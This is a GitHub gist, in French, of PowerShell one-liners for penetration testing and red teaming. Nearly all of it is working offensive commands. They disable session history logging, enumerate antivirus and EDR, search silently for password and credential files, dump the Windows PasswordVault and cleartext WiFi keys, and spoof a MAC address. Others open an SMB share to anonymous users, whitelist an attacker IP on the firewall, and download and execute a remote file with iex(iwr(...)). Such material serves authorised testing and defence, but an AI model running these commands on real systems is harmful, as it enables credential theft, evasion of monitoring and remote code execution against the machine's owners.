Created
April 12, 2023 20:51
-
-
Save Twibow/74e894cae062ea2aa7e9a4ee37b3c746 to your computer and use it in GitHub Desktop.
Commandes Powershell utiles en Pentest / Red Team
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
------------------------------------------------------------------------ | |
..:: Quelques commandes Powershell - Usefull for Pentest & Red Team ::.. | |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
----------------------------------------------------------------------------------------- | |
## Désactiver les logs (historisation) des commandes de la session Powershell en cours ## | |
----------------------------------------------------------------------------------------- | |
PS C:\Users\Thibow> Set-PSReadlineOption –HistorySaveStyle SaveNothing | |
Ou ... | |
PS C:\Users\Thibow> Remove-Module PSReadline | |
--------------------------------------------------------------- | |
## Lister les AV / EDR en cours d'execution sur le endxpoint ## | |
--------------------------------------------------------------- | |
PS C:\Users\Thibow> Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | |
--------------------------------------------------------------------- | |
## Rechercher silencieuseuement des documents de manière récursive ## | |
--------------------------------------------------------------------- | |
PS C:\Users\Thibow> gci C:\Users\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue | |
---------------------------------------------------------------------------- | |
## Recherche des fichier de configuration contenant le mot clé "password" ## | |
---------------------------------------------------------------------------- | |
PS C:\Users\Thibow> gci C:\Users\ -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password" | |
------------------------------------------------------------------------------------- | |
## Recherche de mots de passe dans les fichiers de configuration de base de donnée ## | |
------------------------------------------------------------------------------------- | |
PS C:\Users\Thibow> gci C:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString" | |
----------------------------------------------------------- | |
## Extraction de mot de passe dans Windows PasswordVault ## | |
----------------------------------------------------------- | |
PS C:\Users\Thibow> [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword();$_ } | |
------------------------------------------------------------------- | |
## Récupération des mot de passe WiFi enregistré sur le endpoint ## | |
------------------------------------------------------------------- | |
# Version FR # | |
PS C:\Users\Thibow> (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Contenu de la clé\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | |
# Versoin EN # | |
PS C:\Users\Thibow> (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | |
------------------------------------------------ | |
## Modifier la MAC Adresse de sa carte réseau ## | |
------------------------------------------------ | |
PS C:\Users\Thibow> Set-NetAdapter -Name "Ethernet0" -MacAddress "00-01-18-57-1B-0D" | |
------------------------------------------------------------- | |
## Créer un répertoire partagé SMB accessible en everybody ## | |
------------------------------------------------------------- | |
PS C:\Users\Thibow> new-item "C:\Users\prout\" -itemtype directory | |
PS C:\Users\Thibow> New-SmbShare -Name "sharedir" -Path "C:\Users\prout\" -FullAccess "Everyone","Guests","Anonymous Logon" | |
------------------------------------------------------------------------------------------------- | |
## Whitelister une adresse IP sur le firewall local Windows (autorisation pour tous les ports) ## | |
------------------------------------------------------------------------------------------------- | |
PS C:\Users\Thibow> New-NetFirewallRule -Action Allow -DisplayName "pentest" -RemoteAddress 10.10.15.123 | |
// Supprimer la règle :: | |
PS C:\Users\Thibow> Remove-NetFirewallRule -DisplayName "pentest" | |
---------------------------------------------- | |
## Téléchargement et éxécution d'un fichier ## | |
---------------------------------------------- | |
PS C:\Users\Thibow> iex(iwr("https://UrlDuFichier/123.exe")) | |
iwr == Invoke-WebRequest | |
iex == Invoke-Expression | |
----------------------------------------------- | |
## Récupérer le SID de l'utilisateur courant ## | |
----------------------------------------------- | |
PS C:\Users\Thibow> ([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value | |
## |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment